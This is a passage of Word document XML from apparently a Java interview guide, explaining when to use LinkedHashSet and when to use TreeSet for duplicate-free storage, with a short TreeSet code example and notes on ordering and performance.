    <w:p w14:paraId="1FE09F89" w14:textId="77777777" w:rsidR="003273E9" w:rsidRPr="00CE4B95" w:rsidRDefault="003273E9" w:rsidP="00845C56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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HashSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows only </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unique</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> elements and preserves the order in which elements are inserted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075519F9" w14:textId="77777777" w:rsidR="003273E9" w:rsidRPr="00CE4B95" w:rsidRDefault="003273E9" w:rsidP="00845C56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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insertion order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is maintained, meaning the order of the elements in the set will be the same as the order in which they were added.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D218B5" w14:textId="77777777" w:rsidR="003273E9" w:rsidRPr="00CE4B95" w:rsidRDefault="003273E9" w:rsidP="00845C5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lternative Choices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250ABAE3" w14:textId="77777777" w:rsidR="003273E9" w:rsidRPr="00CE4B95" w:rsidRDefault="003273E9" w:rsidP="00845C56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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st (e.g., ArrayList)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If maintaining duplicates is not a concern, but you need to preserve order, a List like ArrayList or LinkedList can also be used. However, you will need to manually handle duplicates using methods like contains() before adding elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B055DB" w14:textId="77777777" w:rsidR="003273E9" w:rsidRPr="00CE4B95" w:rsidRDefault="003273E9" w:rsidP="00845C56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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TreeSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: This removes duplicates but does </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not preserve insertion order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>; instead, it sorts the elements according to their natural order or a custom comparator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DA7FA9" w14:textId="77777777" w:rsidR="003273E9" w:rsidRPr="00CE4B95" w:rsidRDefault="003273E9" w:rsidP="00845C5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For your specific requirement (removing duplicates and preserving insertion order), </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LinkedHashSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the most appropriate collection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34076A4E" w14:textId="5726F3C7"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7399571">
          <v:rect id="_x0000_i1487" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2292C402" w14:textId="77777777" w:rsidR="00E8057F" w:rsidRPr="00CE4B95" w:rsidRDefault="00E8057F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="145" w:name="_Toc196307625"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Which Collection will you avoid duplicating and store data in a sorted manner?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="145"/>
    </w:p>
    <w:p w14:paraId="332CCBEA" w14:textId="2F9D9A3C" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B70627">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o </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>avoid duplicate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store data in a sorted manner</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, the most appropriate collection in Java is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TreeSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5897AB7E" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B7062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y TreeSet?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9AF8A8" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B70627">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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voids Duplicates</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Like all </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Set</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> implementations, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TreeSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> does not allow duplicate elements. It ensures that only unique elements are stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4236D9" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B70627">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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orted Data</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Unlike HashSet or LinkedHashSet, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TreeSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> stores elements in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sorted order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. The elements in a TreeSet are sorted either by their natural order (if they implement Comparable) or by a comparator passed to the set at the time of creation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003EF94E" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B7062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ternal Working of TreeSet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEEC9FB" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B70627">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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orted Set</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TreeSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is backed by a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Red-Black Tree</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (a balanced binary search tree). This allows it to maintain a sorted order of elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C74ED9" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B70627">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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orting</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The sorting of elements is based on the compareTo() method for natural ordering (if the elements are Comparable), or a custom comparator can be provided to dictate the sorting order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A288036" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B7062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Using TreeSet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECB7AB4" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B7062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TreeSet;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2F0B3B" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B70627">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ACEA6FB" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B7062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TreeSetExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E8CF24" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B7062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125F5765" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B7062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e a TreeSet of integers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA883D2" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B7062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reeSet&lt;Integer&gt; set = new TreeSet&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D61017" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B7062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C34257D" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B7062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dding elements to the TreeSet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178EEBCD" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B7062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40);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F8E492" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B7062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10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4765B1B8" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B7062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30);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235FC347" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B7062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20);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD32FB2" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B7062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10);  // Duplicate, will not be added</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD97C48" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B7062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581ADF9" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B7062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nting the TreeSet (elements will be in sorted order)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFBFECD" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B7062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TreeSet: " + set);  // Output will be [10, 20, 30, 40]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406AD40B" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B7062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D556E1B" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B7062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16DDFEB" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B7062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p w14:paraId="5F34199A" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B7062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eeSet: [10, 20, 30, 40]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC723FA" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B7062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Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBC1167" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B70627">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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voids Duplicates</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Like all Set implementations, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TreeSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensures that only </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unique</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> elements are stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF45F53" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B70627">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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orted Order</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TreeSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> stores elements in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sorted order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (natural order or custom comparator). For numbers, this means ascending order; for strings, it will be lexicographical order, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF9FB38" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B70627">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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erformance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The operations add(), remove(), and contains() in a TreeSet have a time complexity of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>O(log n)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, due to the underlying Red-Black tree structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D278E26" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B7062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to Use TreeSet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71853CD7" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B70627">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TreeSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you need to store data in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sorted order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> while also ensuring that there are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>no duplicates</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7BF9D2" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B70627">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
